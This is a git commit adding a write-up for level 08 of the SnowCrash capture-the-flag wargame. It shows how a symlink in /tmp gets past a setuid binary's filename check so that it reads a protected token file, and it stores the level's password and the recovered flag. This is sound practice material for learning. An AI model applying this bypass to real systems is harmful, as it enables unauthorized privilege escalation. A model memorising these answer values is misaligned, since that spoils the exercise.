level08

2026-01-19 17:39:23 +01:00 · 2026-01-19 17:39:23 +01:00 · bade2fb952
commit bade2fb952
parent 51334d4b4f
3 changed files with 46 additions and 0 deletions
--- a/levels/08/README.md
+++ b/levels/08/README.md
@ -0,0 +1,44 @@
+# Level 08
+
+## how to login
+
+username: level08
+
+password: fiumuikeil55xe9cu4dood66h
+
+## Goal
+
+run `getflag` as user `flag08`
+
+## Actually doing something
+
+```bash
+level08@SnowCrash:~$ ll
+total 28
+dr-xr-x---+ 1 level08 level08  140 Mar  5  2016 ./
+d--x--x--x  1 root    users    340 Aug 30  2015 ../
+-r-x------  1 level08 level08  220 Apr  3  2012 .bash_logout*
+-r-x------  1 level08 level08 3518 Aug 30  2015 .bashrc*
+-rwsr-s---+ 1 flag08  level08 8617 Mar  5  2016 level08*
+-r-x------  1 level08 level08  675 Apr  3  2012 .profile*
+-rw-------  1 flag08  flag08    26 Mar  5  2016 token
+```
+
+intresting, we have the usual setuid binary, but we also have a file we can't read named token. I wonder if the flag is there
+
+lets run the binary and see what happens
+
+```bash
+level08@SnowCrash:~$ ./level08 
+./level08 [file to read]
+level08@SnowCrash:~$ ./level08 token
+You may not access 'token'
+```
+It is a little bit smart, lets try to outsmart it by using symlinks
+
+```bash
+level08@SnowCrash:~$ ln -s $(realpath token) /tmp/level08
+level08@SnowCrash:~$ ./level08 /tmp/level08
+quif5eloekouj29ke0vouxean
+```
+the old tale of checking for filename, and not actual file !
--- a/levels/08/flag
+++ b/levels/08/flag
@ -0,0 +1 @@
+quif5eloekouj29ke0vouxean
--- a/levels/08/passwd
+++ b/levels/08/passwd
@ -0,0 +1 @@
+fiumuikeil55xe9cu4dood66h